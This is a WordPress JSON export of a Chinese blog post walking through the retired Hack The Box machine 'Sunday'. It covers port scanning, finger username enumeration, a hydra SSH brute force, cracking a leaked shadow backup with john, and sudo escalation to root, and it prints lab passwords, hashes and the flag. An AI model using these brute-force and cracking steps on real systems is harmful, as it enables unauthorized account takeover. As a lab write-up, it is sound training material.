{"id":114,"date":"2024-11-13T09:23:09","date_gmt":"2024-11-13T01:23:09","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=114"},"modified":"2024-11-13T09:50:32","modified_gmt":"2024-11-13T01:50:32","slug":"htb_machine_sunday","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/htb_machine_sunday\/","title":{"rendered":"HTB\u9776\u673a Sunday \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code>10.10.10.76<\/code><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/\u2026\/Documents\/pentest_notes\/sunday\/nmap_reports]\n\u2514\u2500# ping -c 4 10.10.10.76\nPING 10.10.10.76 (10.10.10.76) 56(84) bytes of data.\n64 bytes from 10.10.10.76: icmp_seq=1 ttl=254 time=273 ms\n64 bytes from 10.10.10.76: icmp_seq=2 ttl=254 time=271 ms\n64 bytes from 10.10.10.76: icmp_seq=3 ttl=254 time=271 ms\n64 bytes from 10.10.10.76: icmp_seq=4 ttl=254 time=270 ms\n\n--- 10.10.10.76 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3233ms\nrtt min\/avg\/max\/mdev = 270.249\/271.114\/273.140\/1.175 ms<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u4e4b\u95f4\u901a\u4fe1\u72b6\u6001\u826f\u597d\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Wed Jul  3 18:42:28 2024 as: nmap -sA -p- --min-rate 2000 -oN .\/ack_result.txt 10.10.10.76\nWarning: 10.10.10.76 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.10.76 (10.10.10.76)\nHost is up (0.27s latency).\nAll 65535 scanned ports on 10.10.10.76 (10.10.10.76) are in ignored states.\nNot shown: 53913 filtered tcp ports (no-response), 11622 unfiltered tcp ports (reset)\n\n# Nmap done at Wed Jul  3 18:48:16 2024 -- 1 IP address (1 host up) scanned in 348.21 seconds<\/code><\/pre>\n<p>\u65e0\u6cd5\u786e\u5b9a\u9776\u673a\u9632\u706b\u5899\u72b6\u6001\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code>TCP<\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Wed Jul  3 18:51:02 2024 as: nmap -sS -sV -A -p- --min-rate 2000 -oN .\/tcp_result.txt 10.10.10.76\nWarning: 10.10.10.76 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.10.76 (10.10.10.76)\nHost is up (0.27s latency).\nNot shown: 54127 filtered tcp ports (no-response), 11403 closed tcp ports (reset)\nPORT      STATE SERVICE VERSION\n79\/tcp    open  finger?\n|_finger: No one logged onx0D\n| fingerprint-strings: \n|   GenericLines: \n|     No one logged on\n|   GetRequest: \n|     Login Name TTY Idle When Where\n|     HTTP\/1.0 ???\n|   HTTPOptions: \n|     Login Name TTY Idle When Where\n|     HTTP\/1.0 ???\n|     OPTIONS ???\n|   Help: \n|     Login Name TTY Idle When Where\n|     HELP ???\n|   RTSPRequest: \n|     Login Name TTY Idle When Where\n|     OPTIONS ???\n|     RTSP\/1.0 ???\n|   SSLSessionReq, TerminalServerCookie: \n|_    Login Name TTY Idle When Where\n111\/tcp   open  rpcbind 2-4 (RPC #100000)\n515\/tcp   open  printer\n6787\/tcp  open  http    Apache httpd\n|_http-title: 400 Bad Request\n|_http-server-header: Apache\n22022\/tcp open  ssh     OpenSSH 8.4 (protocol 2.0)\n| ssh-hostkey: \n|   2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)\n|_  256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port79-TCP:V=7.94SVN%I=7%D=7\/3%Time=66852E78%P=x86_64-pc-linux-gnu%r(Ge\nSF:nericLines,12,\"Nox20onex20loggedx20onrn\")%r(GetRequest,93,\"Loginx\nSF:20x20x20x20x20x20x20Namex20x20x20x20x20x20x20x20x20x20\nSF:x20x20x20x20x20TTYx20x20x20x20x20x20x20x20x20Idlex20x20\nSF:x20x20Whenx20x20x20x20Wherern\/x20x20x20x20x20x20x20x20x\nSF:20x20x20x20x20x20x20x20x20x20x20x20x20???rnGETx20x20\nSF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20?\nSF:??rnHTTP\/1.0x20x20x20x20x20x20x20x20x20x20x20x20x20x2\nSF:0???rn\")%r(Help,5D,\"Loginx20x20x20x20x20x20x20Namex20x20\nSF:x20x20x20x20x20x20x20x20x20x20x20x20x20TTYx20x20x20x20\nSF:x20x20x20x20x20Idlex20x20x20x20Whenx20x20x20x20WherernHEL\nSF:Px20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x\nSF:20???rn\")%r(HTTPOptions,93,\"Loginx20x20x20x20x20x20x20Name\nSF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20TTYx20x20\nSF:x20x20x20x20x20x20x20Idlex20x20x20x20Whenx20x20x20x20Wher\nSF:ern\/x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20\nSF:x20x20x20x20x20???rnHTTP\/1.0x20x20x20x20x20x20x20x20\nSF:x20x20x20x20x20x20???rnOPTIONSx20x20x20x20x20x20x20x2\nSF:0x20x20x20x20x20x20x20???rn\")%r(RTSPRequest,93,\"Loginx20x\nSF:20x20x20x20x20x20Namex20x20x20x20x20x20x20x20x20x20x20\nSF:x20x20x20x20TTYx20x20x20x20x20x20x20x20x20Idlex20x20x20\nSF:x20Whenx20x20x20x20Wherern\/x20x20x20x20x20x20x20x20x20x\nSF:20x20x20x20x20x20x20x20x20x20x20x20???rnOPTIONSx20x20\nSF:x20x20x20x20x20x20x20x20x20x20x20x20x20???rnRTSP\/1.0\nSF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20???rn\")%r(\nSF:SSLSessionReq,5D,\"Loginx20x20x20x20x20x20x20Namex20x20x20x20\nSF:x20x20x20x20x20x20x20x20x20x20x20TTYx20x20x20x20x20x20\nSF:x20x20x20Idlex20x20x20x20Whenx20x20x20x20Wherernx16x03x\nSF:20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20\nSF:x20x20???rn\")%r(TerminalServerCookie,5D,\"Loginx20x20x20x20x2\nSF:0x20x20Namex20x20x20x20x20x20x20x20x20x20x20x20x20x20x\nSF:20TTYx20x20x20x20x20x20x20x20x20Idlex20x20x20x20Whenx20x\nSF:20x20x20Wherernx03x20x20x20x20x20x20x20x20x20x20x20x20\nSF:x20x20x20x20x20x20x20x20x20???rn\");\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\nTCP\/IP fingerprint:\nOS:SCAN(V=7.94SVN%E=4%D=7\/3%OT=79%CT=1%CU=43720%PV=Y%DS=2%DC=T%G=Y%TM=66852\nOS:F0C%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=I%CI=I%II=I%SS=S%T\nOS:S=7)SEQ(SP=108%GCD=1%ISR=109%TI=I%CI=I%TS=7)SEQ(SP=108%GCD=1%ISR=109%TI=\nOS:I%CI=I%II=I%SS=S%TS=7)SEQ(SP=108%GCD=1%ISR=109%TI=RD%CI=I%II=I%TS=A)OPS(\nOS:O1=ST11M53CNW2%O2=ST11M53CNW2%O3=NNT11M53CNW2%O4=ST11M53CNW2%O5=NNT11%O6\nOS:=ST11M53C)OPS(O1=ST11M53CNW2%O2=ST11M53CNW2%O3=NNT11M53CNW2%O4=ST11M53CN\nOS:W2%O5=ST11M53CNW2%O6=ST11M53C)WIN(W1=FA4C%W2=FA4C%W3=FA38%W4=FA3B%W5=FA3\nOS:B%W6=FFF7)ECN(R=Y%DF=Y%T=3C%W=FB40%O=M53CNNSNW2%CC=Y%Q=)T1(R=Y%DF=Y%T=3C\nOS:%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T3(R=Y%DF=Y%T=3C%W=FA09%S=O%A=O%F=A\nOS:S%O=ST11M53CNW2%RD=0%Q=)T3(R=Y%DF=Y%T=3C%W=FA09%S=O%A=S+%F=AS%O=ST11M53C\nOS:NW2%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40\nOS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q\nOS:=)T7(R=N)U1(R=Y%DF=N%T=FF%IPL=70%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)\nOS:IE(R=Y%DFI=Y%T=FF%CD=S)\n\nNetwork Distance: 2 hops\n\nTRACEROUTE (using port 143\/tcp)\nHOP RTT       ADDRESS\n1   269.46 ms 10.10.14.1 (10.10.14.1)\n2   269.71 ms 10.10.10.76 (10.10.10.76)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Wed Jul  3 18:59:24 2024 -- 1 IP address (1 host up) scanned in 502.15 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Wed Jul  3 19:04:10 2024 as: nmap -sU -p- --min-rate 2000 -oN .\/udp_ports.txt 10.10.10.76\nWarning: 10.10.10.76 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.10.76 (10.10.10.76)\nHost is up (0.27s latency).\nNot shown: 62572 open|filtered udp ports (no-response), 2962 closed udp ports (port-unreach)\nPORT    STATE SERVICE\n111\/udp open  rpcbind\n\n# Nmap done at Wed Jul  3 19:10:06 2024 -- 1 IP address (1 host up) scanned in 356.10 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Wed Jul  3 19:13:36 2024 as: nmap -sU -sV -A -p 111 -oN .\/udp_result.txt 10.10.10.76\nNmap scan report for 10.10.10.76 (10.10.10.76)\nHost is up (0.27s latency).\n\nPORT    STATE SERVICE VERSION\n111\/udp open  rpcbind 2-4 (RPC #100000)\nDevice type: general purpose|storage-misc\nRunning: illumos OpenIndiana, Joyent SmartOS, Nexenta, Oracle Solaris 10|11, Sun embedded, Sun OpenSolaris, Sun Solaris 11\nOS CPE: cpe:\/o:illumos:openindiana cpe:\/o:joyent:smartos cpe:\/o:nexenta:nexenta cpe:\/o:oracle:solaris:10 cpe:\/o:oracle:solaris:11 cpe:\/h:sun:storage_7410 cpe:\/o:sun:opensolaris cpe:\/o:sun:sunos:5.11\nToo many fingerprints match this host to give specific OS details\nNetwork Distance: 2 hops\n\nTRACEROUTE (using port 111\/udp)\nHOP RTT       ADDRESS\n1   271.07 ms 10.10.14.1 (10.10.14.1)\n2   271.62 ms 10.10.10.76 (10.10.10.76)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Wed Jul  3 19:13:40 2024 -- 1 IP address (1 host up) scanned in 4.68 seconds<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3a<code>Oracle Solaris<\/code>\u3002<\/p>\n<hr \/>\n<h1>\u670d\u52a1\u63a2\u6d4b<\/h1>\n<h2>Finger\u670d\u52a1\uff0879\u7aef\u53e3\uff09<\/h2>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>finger-user-enum<\/code>\u5de5\u5177\u914d\u5408<code>unix_users.txt<\/code>\u5b57\u5178\u679a\u4e3e\u7528\u6237\u540d\uff0c\u6210\u529f\u679a\u4e3e\u51fa\u5982\u4e0b\u7528\u6237\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720049125308-6bb25aeb-1d5c-4284-bc08-05f14b99eb33.png\" alt=\"\" \/><\/p>\n<p>\u4f7f\u7528<code>finger<\/code>\u5de5\u5177\u67e5\u8be2\u7528\u6237\u7ec4<code>user<\/code>\uff0c\u53c8\u53d1\u73b0\u51e0\u4e2a\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-bash\">finger -m user@10.10.10.76<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720049216879-52fb3e7c-4f82-40a8-aa83-e46bf96da814.png\" alt=\"\" \/><\/p>\n<p>\u5c06\u6536\u96c6\u5230\u7684\u7528\u6237\u4fdd\u5b58\u4e3a\u5b57\u5178\uff1a<\/p>\n<pre><code class=\"language-plain\">adm\nadmin\ndladm\nnetadm\nnetcfg\ndhcpserv\nikeuser\nbin\ndaemon\nftp\nlp\nnoaccess\nnobody\nnobody4\nntp\nprinter\nsshd\nsys\nroot\nuser\naiuser\nopenldap<\/code><\/pre>\n<h2>RPC PortMapper\u670d\u52a1\uff08111\u7aef\u53e3\uff09<\/h2>\n<p>\u4f7f\u7528<code>Nmap<\/code>\u5de5\u5177\u626b\u63cf<code>111\/udp<\/code>\u7aef\u53e3\uff1a<\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Thu Jul  4 07:38:50 2024 as: nmap -sSUC -p111 -oN .\/port_tcp-111_report.txt 10.10.10.76\nNmap scan report for 10.10.10.76 (10.10.10.76)\nHost is up (0.22s latency).\n\nPORT    STATE SERVICE\n111\/tcp open  rpcbind\n111\/udp open  rpcbind\n\n# Nmap done at Thu Jul  4 07:39:08 2024 -- 1 IP address (1 host up) scanned in 18.54 seconds<\/code><\/pre>\n<p>\u672a\u63a2\u6d4b\u5230\u4efb\u4f55\u4fe1\u606f\u3002<\/p>\n<h2>SSH\u670d\u52a1\uff0822022\u7aef\u53e3\uff09<\/h2>\n<p>\u7aef\u53e3<code>Banner<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/\u2026\/Documents\/pentest_notes\/sunday\/nmap_reports]\n\u2514\u2500# nc -nv 10.10.10.76 22022                                  \n(UNKNOWN) [10.10.10.76] 22022 (?) open\nSSH-2.0-OpenSSH_8.4<\/code><\/pre>\n<h2>Web\u5e94\u7528\u7a0b\u5e8f\uff086787\u7aef\u53e3\uff09<\/h2>\n<p>\u6253\u5f00\u4e3b\u9875\uff1a<code>http:\/\/10.10.10.76:6787\/<\/code>\uff0c\u9875\u9762\u81ea\u52a8\u8df3\u8f6c\u5230\u4e86<code>\/solaris<\/code>\u76ee\u5f55\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720051855112-b0ad1f2c-0103-40de-9059-5c3db85c70d0.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u7f51\u9875\u4e0a\u90e8\u7f72\u4e86<code>Oracle Solaris WebUI<\/code>\u64cd\u4f5c\u7cfb\u7edf\u7ba1\u7406\u7a0b\u5e8f\uff0c\u4f46\u7248\u672c\u672a\u77e5\u3002<\/p>\n<p>\u540c\u65f6\u53d1\u73b0\u57df\u540d<code>sunday.htb<\/code>\u3002<\/p>\n<p>\u5c1d\u8bd5\u626b\u63cf\u76ee\u5f55\uff0c\u6ca1\u6709\u4efb\u4f55\u53d1\u73b0\u3002<\/p>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<h2>\u5927\u5b57\u5178\u679a\u4e3eFinger\u670d\u52a1<\/h2>\n<p>\u9274\u4e8e\u6ca1\u6709\u53d1\u73b0\u4efb\u4f55\u7a81\u7834\u53e3\uff0c\u800c\u7206\u7834<code>SSH<\/code>\u6216<code>Web<\/code>\u5e94\u7528\u9700\u8981\u7528\u6237\u540d\uff0c\u73b0\u5728\u53ea\u6709<code>Finger<\/code>\u670d\u52a1\u53ef\u4ee5\u8fdb\u4e00\u6b65\u5229\u7528\u3002\u5c1d\u8bd5\u4f7f\u7528<code>SecLists<\/code>\u7684<code>names.txt<\/code>\u7528\u6237\u540d\u5b57\u5178\u8fdb\u884c\u8fdb\u4e00\u6b65\u679a\u4e3e\uff1a<\/p>\n<pre><code class=\"language-bash\">.\/finger-user-enum.pl -U \/usr\/share\/wordlists\/seclists\/Usernames\/Names\/names.txt -t 10.10.10.76<\/code><\/pre>\n<p>\u811a\u672c\u679a\u4e3e\u51fa\u4e86<code>16<\/code>\u4e2a\u7ed3\u679c\uff0c\u5176\u4e2d\u5305\u542b\u4e86<code>3<\/code>\u4e2a\u9ad8\u6743\u9650\u7528\u6237\uff08<code>root<\/code>\u3001<code>sunny<\/code>\u3001<code>sammy<\/code>\uff09\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720057904889-c9721b7a-4999-45b5-ae07-d82d3384bf8b.png\" alt=\"\" \/><\/p>\n<h2>\u7206\u7834SSH\u5bc6\u7801<\/h2>\n<p>\u62ff\u5230\u7528\u6237\u540d\u540e\uff0c\u968f\u673a\u9009\u62e9\u4e86<code>sunny<\/code>\u7528\u6237\u540d\uff0c\u4f7f\u7528<code>SSH<\/code>\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-bash\">hydra -l sunny -P \/usr\/share\/wordlists\/rockyou.txt -t 60 -f ssh:\/\/10.10.10.76:22022\/<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720058920330-9e279db5-80a0-41f5-bba9-b0dff80e8569.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u627e\u5230\u767b\u5f55\u51ed\u636e\uff1a<\/p>\n<ul>\n<li><strong>\u7528\u6237\u540d\uff1a<\/strong><code>sunny<\/code><\/li>\n<li><strong>\u5bc6\u7801\uff1a<\/strong><code>sunday<\/code><\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720059422152-ed4208d1-d03f-470e-a9e6-0e3962b605c9.png\" alt=\"\" \/><\/p>\n<p><strong>\u767b\u5f55\u6210\u529f\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u6743\u9650\u63d0\u5347<\/h1>\n<h2>\u7834\u89e3sammy\u7528\u6237\u5bc6\u7801<\/h2>\n<p>\u767b\u5f55\u7cfb\u7edf\u4e4b\u540e\uff0c\u53d1\u73b0\u53ef\u7591\u76ee\u5f55<code>\/backup<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720060865077-aac73e01-fddc-42b5-9e57-bb795fc2fe41.png\" alt=\"\" \/><\/p>\n<p>\u8be5\u76ee\u5f55\u6709\u654f\u611f\u6587\u4ef6<code>shadow.backup<\/code>\uff0c\u4e3a<code>Linux<\/code>\u7cfb\u7edf\u5bc6\u7801\u54c8\u5e0c\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-plain\">mysql:NP:::::::\nopenldap:*LK*:::::::\nwebservd:*LK*:::::::\npostgres:NP:::::::\nsvctag:*LK*:6445::::::\nnobody:*LK*:6445::::::\nnoaccess:*LK*:6445::::::\nnobody4:*LK*:6445::::::\nsammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::\nsunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::<\/code><\/pre>\n<p>\u76f4\u63a5\u5c06<code>sammy<\/code>\u7528\u6237\u7684\u54c8\u5e0c\u590d\u5236\u4e0b\u6765\uff0c\u4fdd\u5b58\u5230\u672c\u5730\uff0c\u968f\u540e\u4f7f\u7528<code>john<\/code>\u548c<code>rockyou.txt<\/code>\u5b57\u5178\u7206\u7834\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720060996176-ed6a567a-5664-4ae7-8c32-7b1573f65346.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u627e\u5230\u767b\u5f55\u51ed\u636e\uff1a<\/p>\n<ul>\n<li><strong>\u7528\u6237\u540d\uff1a<\/strong><code>sammy<\/code><\/li>\n<li><strong>\u5bc6\u7801\uff1a<\/strong><code>cooldude!<\/code><\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720061137433-38710500-6386-4e70-8e3a-8522f0d6e378.png\" alt=\"\" \/><\/p>\n<p><strong>\u5207\u6362\u7528\u6237\u6210\u529f\uff01\uff01<\/strong><\/p>\n<h2>Sudo\u63d0\u6743<\/h2>\n<p>\u5207\u6362\u5230<code>sammy<\/code>\u7528\u6237\u4e4b\u540e\uff0c\u5c1d\u8bd5\u67e5\u770b<code>Sudo<\/code>\u6743\u9650\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720061398936-640d920a-1331-4e9b-b37e-c72661679779.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u5f53\u524d\u7528\u6237\u53ef\u4ee5\u4f7f\u7528<code>Sudo<\/code>\u6267\u884c\u4efb\u4f55\u547d\u4ee4\uff0c\u76f4\u63a5\u5207\u6362\u5230<code>root<\/code>\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-plain\">sudo su -<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720061497456-bd21a95f-4380-4464-85e4-4d2204291531.png\" alt=\"\" \/><\/p>\n<p><strong>\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>Flag\u6587\u4ef6\u5c55\u793a<\/h1>\n<pre><code class=\"language-plain\">d9b4ffa8c562563196173088d7ddc30e<\/code><\/pre>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.10.76 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b \u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/\u2026\/ &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-114","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/114","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=114"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/114\/revisions"}],"predecessor-version":[{"id":115,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/114\/revisions\/115"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=114"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=114"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=114"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}